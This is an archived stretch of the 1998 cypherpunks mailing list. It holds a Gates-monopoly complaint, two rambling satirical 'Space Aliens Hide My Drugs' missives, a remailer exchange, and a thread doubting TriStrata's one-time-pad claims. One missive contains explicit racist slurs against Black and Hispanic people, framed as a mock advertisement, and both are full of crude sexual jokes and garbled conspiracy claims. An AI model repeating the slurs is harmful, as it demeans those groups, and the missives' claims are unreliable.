      yes, and no, and maybe, and I don't know, and fuck-off.
_________________________________________________________________ attila__

On Sun, 28 Jun 1998, Brian wrote:

>> 	...(Compared to Gates,  Hannibal lacks vision...) 
>>
>> 	I read a statistic yesterday (I think) that 90%
>> of all PCs have Win95 installed, and Gates wants 90% of them to 'upgrade'
>> to Win98. He has 90% of the WORLD market. And the Zionist theory people
>> worry about 6% controlling 90%? What about one guy controlling 90% of the
>> PC in the world? And stopping him is a restriction of his rights as defined
>> by the American Constitution? During a debate on this, people happened to
>> mention that the constitution was partially about resisting tyranny. Gates
>> could bury ANYTHING DEEP into a new OS (remember the windows bomb joke that
>> made the rounds a while back?), and no one would know. even then, people in
>> businesses don't speak up, cause those who dissent, get fired.
>>
>>     I think that Gates should be slowed down now, while the chance is still
>> there, and (somehow) get some alternative, workable, opposition OS's up and
>> running, yet are compatible with win95/98 as well. The only way forward is
>> through both unity and diversity.
>>







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Mon, 29 Jun 1998 11:55:25 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Dina Moe Hmmm... - SPACE ALIENS HIDE MYDR
Message-ID: <009C86DD.7C367360.5@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


Dina Moe Hmmm... - SPACE ALIENS HIDE M DRUGS!!!
____________________________________________

>Return To Sender: ElvisImpersonatorChainsawMassacre@mccullagh.stihl
>Return Of Server: MX%RodLaver@west.cscw.pima.edu
>Date: Fri 13(*2) June 1998 ; 7:09 am/pm
>Subject: Hmmmm...
>
>"So what prompted you to start writing those missives to cypherpunks?" 
>
>Rectum McCullagh-Caulkin
>(aka Tim C. May, Sir Stan Sequin, Joicho Ito-Dogs, No Body,
> AnEnvelopeManufacturerToBeNamedLater, Nanny Anna Mess, etc.)

On the advice of my lawyers:
        GoDoG & DoGoD,
        Attorneys At Law & Lawlessness,
        Alpha & Omego Building, Suite 16,
        Nymphomani aks, N 010101
I have decided to tell the Truth, the Whole Truth, and also a
variety of Half-Truths, leaving it up to the responedent to
decide what level of truth HeOrShe can deal with without 
becoming despondent, thus putting even more of a burden on
the American R&D Department's booth at Juxtaposition '98 in
their competition with the Japanese L&R Juxtaposition '98
Booth, widely rumored to have been behind the Abraham Lincoln 
assassination.
In other words, your chances of getting a 'straight' answer are
comparable to the lengthy discussions in regard to the 'dick'
of a President whose name isn't even Richard, in the first place.

In defense of my rudimentary rudeness in replying ridiculously to
a perfectly reasonable and seemingly serious question, I must admit
that my intentions to provide an equally serious response to the
question above were thwarted by the intervention of a HigherPower-
CapableOfSquaringTheShitOutOfJason, in a process providing pretty
persuasive proof that the CranialConsipiracyCrapola I am about
to provide for your non-racist, but nevertheless discriminating,
mind, is nothing more nor less than as honest and direct anwer to
your question as I am capable of giving, given the grandoise nature
of the nature of the claim I am about to stake claim to, not as a
Wooden Indian nor a Vampire, but simply one who is driven by Forces
of Light and Darkness that are not only beyond my Ken to understand,
but also beyond the Barbie Wired to the MeatSpace Manifestation of
the magazine which was ultimately responsible for my ultimately
sending my intimate informational infatuations with CypherPunks
Issues, whether digital or organic, to the Disturbed Male LISP.

In short, it is those depraved motherfuckers at Wired Magazine who
must ultimately be held responsible for my continued spamming of
a SingleInnocentCypherPunk (TCM-aka Bill Helm-RadiationMan III,
Forever Hettinga, Politician Lefty Frissel, ChevyBlazer FloorMatt,
and Peter SonOfTheSumOfOneAndTuTuBeNamedLater.)
  The True Story (TM) of why I originally subscribed to the 
CPUNX Cardinal & Ms. Spelling LISP has been confirmed by the
Nine UnKnowing to be the result of a subconscious desire to
destroy the Band of Mary Anarchists by forcing them to band
together, forming a well-organized and tightly-knit political
organization dedicated to eliminating me from both DigitalSpace
and MeatSpace. In draw-string shorts, to yank the CPUNKS 
cotton chains and expose their private parts in a manner that
would leave no doubt about the fact that the Magic Circle of
WhiteLipstick around all of the 'members' provides postive
proof of the accuracy of Dr. Dimitri Vulis, KOTM's contention
that Nun of the CypherPunks were born female, and that they
are not, in fact, Anarchists, but merely LostBoys from Lost
Alamo who are alone in the world because they cannot accept
the diagnosis of Dr. Stephan Goodman, who theorizes that
they are "men who love men, every now and then," to whom the
phrase, 'blow it out your ass', has more meaning than it does
for most people.
[Spin Editor: What the Author *meant* to say, is that, as a
 result of being the subject of Direct Electrical Shock Radio 
 Experiments during his youth, he soon learned that, unless
 others in the room were gathered around the radio, the
 correct answer to the question, "Do you hear Voices?" is
 an emphatic "Nope! Not me...nosiree, Bob. Nope...not me!"]

What the Spin Editor *meant* to say, is that my early
exposure to the True Agenda (TM) of the MindPolice left
little doubt in my mind (little of practically *anything*,
actually) that one's career as a TruthMonger would allow
them to keep their head longer with a 'CourtJester@dev.null'
alias, than as "AnneBolyne@head.null', particularly if the
name of the person saying "I'd just like to ask you a few
questions." is OffWithSir Head, or who holds a position
titled 'Head Doctor' in a non-medical surgical facility.
To make a short story long, with a bend in the middle, Dog
spoke to me in a Stream piped through the fillings in my
teeth, and told me that there was one who would come before
me, to prepare my way, who would be a 'voice lying in the
wilderness', telling the masses, "I am a messenger for one
who will come after me, who is (a) greater (bullshitter) than
I, sent by Dog to sniff the rear parts of the front-men posing
as wolves, in wolves clothing, who say 'What big teeth I have...
the better to make you render unto Ceasar, that which you
mistakenly thought was yours."
Long before the Starr appeared over DC, I knew that the Virgin
Birth of William Lewinski would never have taken place if there
had not been no room for burning the double-negatives in the 
Ovulate Office which told the True Story (TM) of what had taken
place in the Lincoln bedroom as a result of a sexual Jones that
the King of the Juice could not satisfy, no matter how large
a vein he punctured in women, or vice versa, with his dirty 
needle.

Upon purchasing a copy of the Wired Magazine edition which had
the Jasons of CypherSpace on the front cover, with an article
accompanying it which I did not bother to read, instinctively 
knowing that their Goal was to XOR the Net, so that after
Jesus Saves, Louis Freeh would not be able to put in the
rebound, yanking a man's parole as a result of Space Alien FUD
indicating he had participated in the VirtualNuclearBombing
of pubic buildings eleven KILLometers from MongerItaVille.
Knowing that, even though "Ignorance is no excuse." in the 'ayes'
of a Rigged Justice System, it is better to remain silent than to
speak up and remove all doubt as to one's guilt, I merely glanced
through the copy of Wired sufficiently to confirm the Marshall
Dillon theory that smoking guns doesn't kill people, the
Message kills people, or, more accurately, that the Department
of Justice people covering up the INSLAW affair killed those on
the List of Adrian Messenger, and then put the magazine away
in DeepThroatStorage until Dog, the only Horse I ever bet on
(although I have shot a lot of Horse over the years, sometimes
on the basketball court, sometimes in a seedy alley behind the
GreyHound Computer Buss Station), gave me a No Smoking Gun sign,
with the election of a Wise Man who rose from the dead three
times, as LazerAss Long (cousin of Johnny Wadd), drinking cold
HeinleinKin, playing the SexAPhone at $4.99/minute, running up
the WhiteHouse phone bill and the Federal Deficit, and making
such outstanding use of BlatantLies that his Pole rose in the
Polls at a rate that astounded even Poles named Lewinski, 
leading me to realize that, had I, like Marlo Branded, the 
Rifleman on the grassy knoll, despite my reputation as a 
traitorous, lying coward, followed my instincts and run for 
President of the United States of America, "I could'a been 
a contend'a..."

My point, if I may be so Bold (although without Italics, having
never been to Sicily) to state it plainly (without extra cheese),
is that Lucky Green is a fucking idiot...
He is such an ignorant, Robotically Programmed Sheeple, 
incapable of free, independent thought, that the only possible
way to accurately impress upon you his total devoidness (coming
soon to a dictionary near you) of hope in ever truly understanding
the concepts of True Freedom, Liberty and the Pursuit of Felony
Happiness, can be illustrated only by sharing with you the
"True Story (TM) of TruthMangler", Penguin Books, FrostBack
Division.
  'The True Story of the InterNet' when stripped of all of the
grandoise, pretentious, mystical FUD surrounding its artificial
dissemination across HyperSpace, can be summarized by quoting
"All My Lies Are True", by Carroll.
  "All my lies are true.
   And everything I do, I really am."
Believe it or not, Ripley, that's all there is... That's the
whole fucking poem. In the end, that's all there really is
to say.

Upon receiving an email from AnInterViewerToBeNamedLater, who
was named earlier, in the 'BumBoy III' chapter of Space Aliens
Hide My Drugs (which, correctly, should also have single quotes
around the title), I was quite prepared to write a short, simple
response to the question, "So what prompted you to start writing 
those missives to cypherpunks?"
As always, the fillings in my teeth convinced Reality to become
a participant in an Intervention program designed to thwart my
efforts to continue the heavy drug-use enabling me to be 'normal'
and 'saved' me from sanity by using the TV program, '60 Minutes',
to embody The Voice (TM) coming from the BurningBush, calling
for a "New World Order", reminding me that the BurningBush in
the bunker outside of Berlin was a clever ruse, later to become
a 'play on words' in a Braun Shaver advertising campaign that
referred to a 'close shave', to disguise the fact that it is
the AdamAntartic that holds the key to FrostBack Musicians
embedding hints in their music in regard to the Reptilian
Nazis biding their time, emerging from Florida puddles to
dine on the gonads of FrenchConnection Poodles, leading me to
realize that I forgot to mention how my insanity illustrates 
Lucky Green's ignorance.
(But, before I return to that subject, I should take the time
to explain that this disjointed '60 Minutes' diatribe refers
to the fact that my efforts at a 'direct reply' to D.M. Stihl's
question was interrupted by a sychronicitious eruption from
The Tube ("Watch me and I'll bleed you, 'Cause you eat the
shit I feed you") during which Leslie Stahl (not to be confused
with the chainsaw with a similar name), presented a piece called
'The Rumor Mill', in which she ignored the attempts of InterNet
Magazine's Edwin Cantor (?) to explain that the Freedom Of The
InterNet was a Healing Force capable of returning HumanKind to
a Wholistic State wherein we use our minds to discriminate 
between FUD (Fear/Uncertainty/Disinformation), MUD (Mind/
Uniformity/Disinformation) and CRUD (Conscious Realists
Using Discrimination), thereby forcing the InterNet User/
Consumer to actually Think (TM) before accepting any of
the information that is pulled, prodded or pushed into the
range of their perceptive attention...
Hang on a second, I lost my train of thought...
Oh, yeah! Anyway, Leslie Stahl, desperately attempting to
maintain the illusion that MainStream Lies piped through
the OfficialNewsStream are preferable to Non-Officially-
Recognized-Lies on J. Orlin Grabbe's 'World's 50 Greatest 
Conspiracies' website, subliminally inserted the bent logic
of the pricks in DC, using words such as Junk/Regulation/
OnLinePoliceMan(no mention of toilet plungers...go figure)/
BadInformation...
Fuck completing that train of thought! 'BadInformation' implies
that the Freedom To Choose To Believe BadInformation does not
exist, and that NetiZens, like CitiZens, are all Sheeple who
need the people from the government, who are here to help us,
to step in and regulate/legislate which BadInformation will be
magically transformed into Reality by blessing it with the
OfficalSealOfApproval.
Random Thought That MayOrMayNot Apply #27:
Question: "Who was not happy to see the Prodigal Son return?"
Answer: "The fatted calf."
My point is this: "Penned cattle have been found to gain as
much weight when fed a combination of drugs, shredded newspaper
and animal excrement, as when fed whole grains."
Therefore, it is not in the best interests of the ProfitMongers
to feed us the Truth, and, CitiZen or NetiZen, it is in our own
best interest, when we meet the Bubba on the road, to kill him.)

[Idioter's Note: Good prosecutors, recognizing the limited
 attention span of the spawn of pawns of modern civilization,
 due to being force-fed ten-second sound-bytes, and hyphenated
 words designed to evoke emotive responses rather than logical
 thought processes, would have long ago begged the Court Of
 Public Opinion for a short recess, in order to allow the
 Readers/Jurors time to grab a bite to eat, suck down a cold
 beer or two, and engage in sexual fantasies about their
 fellow jurors.
 However, the Author plans to proceed, uninterrupted, even
 though HeOrShe risks once again letting the SAHMD manuscript
 fall into semi-coherent mad ramblings, since HeOrShe realizes
 that, if the Reader has not yet learned to order Pizza, Beer,
 and AMasseuseToBeMaimedLater before undertaking the burdensome
 task of reading the True Story manuscripts, then they are most
 likely a goddamn Republican, anyway, with little hope of ever
 truly understanding a missive meant to manipulate their mind
 toward a realistic, non-discriminatory political point of view
 which can only be understood by Democrats who are willing to
 sit in the back of the bus with niggers and spics, although
 they inevitably shit their pants and jump back on the bus
 if one of those thieving fucking darkies happens to get off
 at the same stop as they do.*
 *This racist interlude is a paid advertisement, sponsered by
  Democratic Friends of the Kluless Klux Klan.
 Anyway, I have forgotten where this aside was going, but I
 just remembered I was attempting to get back to explaining
 how my derision of Lucky Green is, in reality, a veiled
 reference to my own idiocy, so I will do that...]

I was devestated when Lucky Green, wearing a Prozac T-Shirt,
while I, on the other hand, had a pocket full of Prozac, told
me, "I read 'The Xenix Chainsaw Massacre', but I didn't
understand what it was about."
I was devastated as a result of realizing that Lucky was nothing
more nor less than a mindless, robotic result of the *new*
generation of programmed, robotic Sheeple. I was devastated
because Lucky was a reminder that, despite my great pretensions
of being an anarchistic, free, individual, capable of independent
thought, I was just as guilty of unthinking automatism, with the
main difference between myself and Lucky being that the programming
I had bought into had tailfins and cruise control, instead of
point-and-click and multimedia capability.
In effect, although I considered myself some exemplary example
of the evolution of mankind (usually remembering to refer to
'humankind' to illustrate my UniSexual/NonRacist/Politically 
Correct rEvolutionAiryFairy development), I was actually a
fraud--not a TruthMonger, but a JokeMonger.

  While allowing myself the luxury of consternation over Lucky
Green being of a GenerationX which could not recognize the
prophetic warnings contained in 'The Xenix Chainsaw Massacre',
due to having been educated in an era where the 'BB/BB' tattoo
on a child's forehead, indicating that one was a BumBoy owned
by BigBrother (replacing childhood circumcision indicating that
a child was owned by the GodOfMoses), I nonetheless comforted
myself with the thought that *my* cowardly acceptance of 'the
way things are', illustrated by using my sense of ironic humor
to poke fun at things I knew to be insane, instead of taking
a firm, serious stand that ultimately results in crucifixion,
in Palestine, or to being barbequed, in Texas (see...there I 
go again), was somehow superior to the cowardice of Lucky's
generation, which gives Non-Sexual LipService to freedom,
privacy and anarchy, while preparing for an old-age where
they will undoubtedly justify their lack of total committment
to fighting the GreatEvil of their time by saying, "es, but
when the Computer was Fuhrer, the trains ran on time...until
the year 2000, of course."
I, like Lucky and the rest of the CypherPunks, told myself
that the problem was Dimitri, always trying to push Black
Unicorn's envelope, and not accepting my excuse that I wasn't 
really a cocksucker, but merely accepting of the fact that
BigBrother had a lot of mouths to feed...

[I know that I've rambled on too long to really hold the
 attention of a generation that traded in twenty-minute
 guitar solos for a Pentium processor, and really don't
 have time to wait for me to get to the point of what
 I am trying to say (despite their refusal to admit that
 the only reason they need a Pentium processor, in the
 first place, is to speed up the downloading of the ads
 on the Anti-SPAM Anarchist WebPage they are accessing,
 not to mention the mountains of excess commas contained
 in the 'True Story' manuscripts...).
 However, I need to run to the Liquor Store, giving the
 soft-drug old farts on the CPUNKS list a chance to "smoke
 'em if you got 'em," (<--correct punctuation, will wonders
 never cease?) and the young pissants on the CPUNX list a
 chance to throw on a New Crusty Nostrils CD, 'Ramblin', 
 featuring 'Green, Green', (<--incorrect punctuation)
 little realizing that the USENET post referring to the
 album as the product of a CypherPunks Action Project first
 appeared on April 1st, and that Lucky wasn't even born when
 it was recorded.
 BAD NEWS!!! - I'll be back...]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Mon, 29 Jun 1998 04:07:25 -0700 (PDT)
To: Anonymous #49812 <an49812@nym.alias.net>
Subject: (no subject)Re: Premail (and Replay)
Message-ID: <199806291108.NAA19606@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous #49812 wrote:
> On 28 Jun 1998, Secret Squirrel wrote:
>
> > Also, remailer@replay.com appears to have been deleted. The 'remailer'
> > user is unknown.
> 
> That's correct. I don't know what happened.

Oh, really?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@tour.unitymail.com>
Date: Mon, 29 Jun 1998 11:17:20 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@tour.unitymail.com>
Subject: CTIA Daily News from WOW-COM - June 29, 1998
Message-ID: <199806291808.NAA00067@revnet4.revnet.com>
MIME-Version: 1.0
Content-Type: text/plain



=============================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

CALEA Summit being held July 21 & 22 in Washington, DC.
Register Now!!  Call (202) 785-0081
=============================================


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bryan Waters <waters@ultimateprivacy.com>
Date: Mon, 29 Jun 1998 11:36:54 -0700 (PDT)
To: "Geoffrey C. Grabow" <cypherpunks@toad.com
Subject: Re: Finally... a One-Time-Pad implementation that works!!!
In-Reply-To: <Version.32.19980627174733.00f29ee0@pop6.ibm.net>
Message-ID: <199806291836.OAA02926@omniwork.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:49 PM 6/27/98 -0400, Geoffrey C. Grabow wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>TriStrata has announced that is has a product that provides OTP without the
>pad distribution problem.  The product also has a unique key-recovery
>system.  Check out:
>
>
>http://www.tristrata.com
>
>for details.
>
I wish there were more details.  Namely how they generate their 10^30 byte
"virtual keystream".
In order to be a true one-time pad the keystream needs to be completely
random, this looks more like a psuedo-random stream cypher to me.  But it
should be fast and still might be secure.  

As a competing one-time pad vendor I don't want to be a pot calling the
kettle black, but If I've learned anything from the cypherpunks, it's prove
it.  Which is what we've tried to do.


Bryan Waters                                    http://www.ultimateprivacy.com
Director of Marketing                    Voice: 512-305-0505 Fax: 512-305-0506
Ultimate Privacy Corporation       3925 W Braker Ln #305, Austin, TX, 78759  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Xcott Craver <caj@math.niu.edu>
Date: Mon, 29 Jun 1998 13:35:07 -0700 (PDT)
To: Bryan Waters <waters@ultimateprivacy.com>
Subject: Re: Finally... a One-Time-Pad implementation that works!!!
In-Reply-To: <199806291836.OAA02926@omniwork.com>
Message-ID: <Pine.SUN.3.91.980629152953.21894A-100000@baker>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 29 Jun 1998, Bryan Waters wrote:

> >TriStrata has announced that is has a product that provides OTP without the
> >pad distribution problem.  The product also has a unique key-recovery
> >system.  Check out:

	No pad distribution problem, but it has a key-recovery system,
	AND the pad is truly random?

> >http://www.tristrata.com
> >
> >for details.

	This must be a typo:  that URL doesn't contain any details.

> I wish there were more details.  Namely how they generate their 10^30 byte
> "virtual keystream".

	Which brings up one more point:  the web page mentions the
	estimated time it takes to "defeat" an encrypted message,
	via brute force.  If it really was a one-time pad, it 
	wouldn't be possible to "defeat" it by brute-force.

							-Caj




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Mon, 29 Jun 1998 13:58:20 -0700 (PDT)
To: "Geoffrey C. Grabow" <gcg@ibm.net>
Subject: Re: Finally... a One-Time-Pad implementation that works!!!
In-Reply-To: <Version.32.19980627174733.00f29ee0@pop6.ibm.net>
Message-ID: <3597FEA9.19A7D5D3@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


Great... more snake oil.... :( 

Geoffrey C. Grabow wrote:
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> TriStrata has announced that is has a product that provides OTP without the
> pad distribution problem.  The product also has a unique key-recovery
> system.  Check out:
> 
> http://www.tristrata.com
> 
> for details.
> 
> ****************************************************************************
> *************
> PGP 5.5.3 Fingerprint: 15B3 DDC1 93BB 4BDF  4DFD 1B27 12A1 E0C4
> ****************************************************************************
> *************
> 
> -----BEGIN PGP SIGNATURE-----
> Version: PGPfreeware 5.5.3i for non-commercial use <http://www.pgpi.com>
> 
> iQEVAwUBNZVo5dc2wHb8nZI1AQFqngf/bCJVbMQX/5sYb181CLONmqWjPzhQ66Ef
> HoyPqxRzEyq4FSWnIuQODH/YTeyyQROUqCZGhC19v8PCiZpI1ynSvn4i+Zcjv9I0
> OZBThzKayNoMne7TkNr49Ah9BwDK6XuwS9bns1xM65zfKLpvKP2gboWkADD52K4w
> eUuJx/cTaR7PgdO/q6nrVRNq1jlaJsFBKGt2q5E1S12ZK1nA+mpKAS95XMgr2IMx
> 5/wJ+jsOIUTn2gWR64nhluOgmcACeIVsiRlsGqfUdL8gJHAl0gaQ7E1+HSOBx60K
> Ur5x5MzQKBKlWcoDaEXB1AsICW2enwdGVOxPBklq1CbcQxFXdBj1DQ==
> =vZmi
> -----END PGP SIGNATURE-----

-- 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Linda Reed--PCC West Campus CSC <lreed@west.cscwc.pima.edu>
Date: Mon, 29 Jun 1998 19:13:58 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Diana Moe Hmmm... - SPACE ALIENS HIDE MY DRUGS!!!
Message-ID: <009C871A.C38D9E40.5@west.cscwc.pima.edu>
MIME-Version: 1.0
Content-Type: text/plain


Return Of Beyond The Planet Of The Valley Of 
Diana Moe Hmmm... - SPACE ALIENS, ETC., ETC.
____________________________________________

  No doubt there are a variety of self-impressed, elitist
CypherPunks who have grown used to my weird capitalization
of the word 'cypherpunks', as well as my excess use of
commas, and incorrect punctuation, having come to recognize 
that these things are part of my personal 'writing style'
(although few realize that, being too lazy to look up
proper spelling, and too ignorant to understand the reasons
behind 'correct' punctuation, I am merely cloaking my sloth
and stupidity under a croak of eccentric Oriental genius).
  However, there are undoubtedly a few egoistical self-proclaimed
geniuses on the CypherPunks Disturbed Male LISP who have noticed
the 'Dina' spelling of the last chapter title being out-of-sync
with the 'Diana' spelling of the current chapter title (see
above), and mentally ridiuculed me as really being the sorry
drunk I keep claiming to be, thinking that I am only dimly 
aware of the difference between my drunk&ignorant-but-honest
typos and literary mistakes, and the typos and mistakes which
I quickly recognize to have deep meaning, and are therefore
inviolate proofs of my true inner genius, in need of no
correction, even if I happen to spot the error.
  If you noticed the discrepancy mentioned above, and were
indeed mentally degrading my literary talent, while considering
yourself to be superior to me because of your ability to 
imitate a robotic computer spell-checking program, you would,
in this case, be quite correct in your assumption, since it
was really a meaninless mistake, but one I will not bother
to rectify, since I am currently both lazy and drunk.

  However, you smart-ass sons-of-bitches, it would be a serious
mistake to fail to realize that my failings in character in no
way negate my obvious intellectual superiority over all of the
pretentious fools who consider themselves part of an elite 
group of PseudoMathematicalGeniusAnarchists because of their
participation in Legendary LevelWithTheGround InterNet
Community MailingList Composed Of Subscribers Who Are Using
11% Of Their Potential BrainPower, and considering themselves
to be 'above' the other InterNet Elitists who are using only
the 'documented average' 10% of their potential brainpower,
and who, in turn, consider themselves to be superior to the 
AOL'ers who believe that their IQ is somehow related to the 
speed of their computer's processor (NOT!!!).

  The short and simple answer to the question, ""So what 
prompted you to start writing those missives to cypherpunks?"
is: "On a mailing list of elitist geniuses using only 11% of 
their potential brainpower, the person using 12% is King!"
  Thus I am able to toy with you silly fools, having little
fear of someone who uses 13% of their brainpower subscribing 
to the CypherPunks list, and putting me in my place, since a
person capable of using 13% of their brain would likely be
above joining the list in the first place...

Why I Send My Missives To The CypherPunks List #327:
   I truly recognize the past, current and future subscribers
to InterNet forums/experiences such as the CypherPunks to be
the only real hope for a world of VirtualReality to rise above
and go beyond the vicious MeatSpaceRealityCycles which are
evident throughout millennia of human history.
  Thus, I feel it incumbent upon myself, as your intellectual
superior, to impress upon you what an ignorant, silly asshole
I am...

  ou stupid fucks think I'm being silly, again, don't you?
I'm fucking serious!!!

  While I truly consider myself to be the current epitome of
human evolution to this point in time, I would, nonetheless,
upon being recognized for my great wisdom and genius and
declared King Of The World, issue a press statement advising
everyone to kill themselves, since a world under my control
would be a scary thing, indeed.
  As far as the world currently being under the control of
murderers and thieves who seem to have a lot of trouble
figuring out some of the more rudimentary things in life,
such as pulling up their fly upon entering the Offal Office,
I really prefer not to think about that, which I am sure
can be understood by voters in Boston, Chicago, ad infinitum,
who eventually figured out that the slogan, "Vote Early, Vote
Often" was not really a part of the original Constitution, as
their Ward Bosses had claimed.

The Original Peter Principle:
  Civilization and Human Behavior provide hard evidence that
Creatures From The Primordial Swamp who crawled out to become
Middle Managers in the Gene Pool did so about a billion years
ahead of schedule.

The Original Clinton Inaugural Address:
  "Most of my time, energy and money was spent on women, booze,
drugs and gambling--the rest I just wasted, eventually becoming 
Governor, and then President."

The Original Commandment:
  "Buy a fucking Clue!"


  I guess that what I am really trying to say is, "As insane
as it would be for you to vote for me as the new King Of The
World / Ruler Of All That Exists / New World Order Dictator,
etc., etc., it would be even more insane for you to *not*
vote for me if I was running against the people currently in
control of our governments and society.

Why I Send My Missives To The CypherPunks List #18:
  My only hope of being understood when I say, "I may be a
stupid fuck, but at least I'm not a stupid fuck." lies in
preaching to an audience that has the ability to understand
that ogi Berra's statement, "It's DejaVu all over again."
was nothing more nor less than A DirectMessageFromGod, 
designed to serve as the Cole's Notes To Universal Human
History From The Beginning Of Time, in a format that would
allow us to write it on a slip of paper we could tuck into
the elastic of our panties, in preparation for the FinalExam.
  True Initiates into the Mythical Circle of Eunuchs have long
understood that my obsession with peeking up women's skirts is
not the result of sexual depravity, but a highly spiritual
exercise in recognizing the difference between the masses of
Sheeple who truly benefit from the advice to wear clean
undergarments, in case they get hit by a bus, and those whose
unique, individual spark of life allows them to recognize that
they can step beyond society's strict moral programming by not
wearing any undergarments at all.

  Although I am currently up to my ass in drunken alligators,
I am still capable of remembering that my original objective
was to drain the Scotch...


And The Way This Relates To Craptographics Is:
  What is encryption, if not the epitome of the Anarchy Of  
Meaning?  
  David Byrne, Largely Suited to serve as the Talking Head
who *could* be the originator of the Voice we hear, asking
us, "Psycho Killer, Qu'est Que C'est?", if we actually owned
a radio, understood that when Bob Dylan sang, "Johnny's in 
the basement, mixing up the medicine...", it was an oblique
reference to Owsley developing a chemical technique to thwart
the MindPolice by using LSD to encrypt one's thought processes.
  The Moody Blues, recognizing that the hippie movement arose
in response to Freedom and Privacy being threatened by a
GreyHound Restroom Public Key System that could be broken by
anyone with a dime, warned us that Timothy Leary, sick, depraved
pervert that he was, was 'outside, looking in', alerting us to
the fact that 'Free Shit' was nothing more than a corporate
advertising ploy by NewAge Gurus who wanted to save the cost
of a dime while buggering us, by telling us we may have won
'Free Film For Life.'
  Phil Zimmerman, Hero Of The TellGovernmentToSitOnItAndRotate
Revolution, provided us with the tools we needed to have a
genuinely Free Shit in Pretty Good Privacy, enabling us to 
lock the door while we crapped out our pearls of wisdom, 
while the anal-retentive government agents on the other side 
of the restroom-stall door dropped their dime, upon finding
out that the cost of peeking up the public's butt had risen
exhorbantly, due to those fucking California Hippie Trouble
Makers slipping 'acid' in their email.

  The point that I probably would have made much earlier in
this chapter, were it not for the fact that I am a drunken,
inconsiderate asshole who fails to realize that *some* people
have better things to do than to waste their time wondering
where the fuck I get all of these goddamn commas, is this:
  Anarchy is our only hope...

  Surely anyone who has been paying attention to life around
them could not have failed to realize that if society elects
some bum going through the dumpster, to look for lunch, to an
official government position that designates him to be the
person responsible for removing doggie-doo from the city
streets (no salary, but all you can eat...), he soon declares
that he needs more money and a larger staff to do his job
properly, funds research indicating that dog owners are a
threat to Family Values, Apple Pie and the American Flag,
presses for Law&Order legislation adding Thirty-Five Dog
ears to the sentence of any Monger or Mongrel who is found
guilty of 'squatting' in commission of a poop, and calls for
the censorship of 'The Doggie Of Anne Frank' because of
its graphic descriptions of FIDO crapping in a secret room 
in the attic, to avoid discovery by the DoggiePoop Gestapo.
  If you think I'm being a WiseGuy, then think again, because,
if memory serves me correctly, this was the lead headline of
News Of The Weird last week, even though the original source
for the article was on page 4,385 of the New ork Times.


The first act of organized religion was to fuck up the Lord's
Prayer.
Anarchy is our only hope...

The first act of organized government was to raise taxes so
that they could give themselves a pay raise.
Anarchy is our only hope...

  It is a knee-jerk reaction to bend over to pick up the soap
when somebody drops it, but it doesn't matter *who* fucks you,
it doesn't matter *how* they fuck you, *when* they fuck you,
or *why* they fuck you...the bottom line is this: If you remain
silent, ignoring the pain and indignity, listening to the still,
small voice of the Tao, you hear the Voice of Eternity echoing
from the birth of time to the death of the ten-thousand things,
whispering what was shouted by a great ogi, upon realizing that
the BigBang was actually a FistFucking KnuckleBall headed Hell
Bent For Leather (a California company) toward the Great Void
where the sun don't shine...you hear the Tao bend over and
whisper, "It's DejaVu, all over again."
Anarchy is our only hope...

Dr. Seuss Explains Sex To Children During His Prostrate Check:
  After God created Adam, he took a bone out of Adam's side
and created Eve. The first thing Adam did was give Eve another
bone-from behind, as he wanted it to be a surprise.
  If two people exist on the face of the planet, then, as surely
as night follows day, one of them is going to get fucked.
Anarchy is our only hope...

LIFE IN HELL Goes Country:
  If you can see two assholes on a horse, without lifting its
tail, then it is a good bet that they are voting to steal your
money and your freedom.
Anarchy is our only hope...

 
  We live in a world where, in a country in which starving
children are dying by the millions, the greatest threat to
those who manage to survive a FamineInTheMidstOfPlenty is
the ArmySurplusLandmine Company's 'Democracy' model, which
is guanteed to blow the limbs off of terrorists and freedom-
fighters, men, women and children, without discrimination as
to race, creed or color, although the guarantee clearly states
that it is not the responsibility of the manufacturer to see
that it serves the purpose for which it was originally 
intended, according the color-glossy brochures distributed 
by retired armed services officers now making the BigBucks as
DC corporate whores.
  
  "The Democracy Model Landmine"
  "Our most popular item, due to the billions of dollars in
   advertising given to its name through the use of taxpayer
   money being spent by unelected entities, both within and
   outside of government circles, was built and designed by
   highly qualified engineers and technicians to 'Save The
   Life Of A Single Child.'
  "As you can see from the pie-charts below, a computer
   simulation showed that a minimum distribution of a 
   hundred units per square mile is sufficient to save
   the life of a single child, providing that the child 
   is not so unfortunate as to accidentally step on a
   landmine."

Anarchy is our only hope...

[GOVERNMENT REQUIRED NOTIFICATION:]
This chapter of 'Space Aliens Hide My Drugs'is a paid
advertisement for the Bienfait Nutly News "Anarchy Is
Our Only Hope' Christmas Special, available in boxes of 
individually-wrapped 1's and 0's (in quantities of 8, 16, 
32, 64...)  
The perfect gift for grouchy old farts who still have the 
box of Pecans you sent them last Christmas, because they 
put their dentures in their shoes, and they can't find 
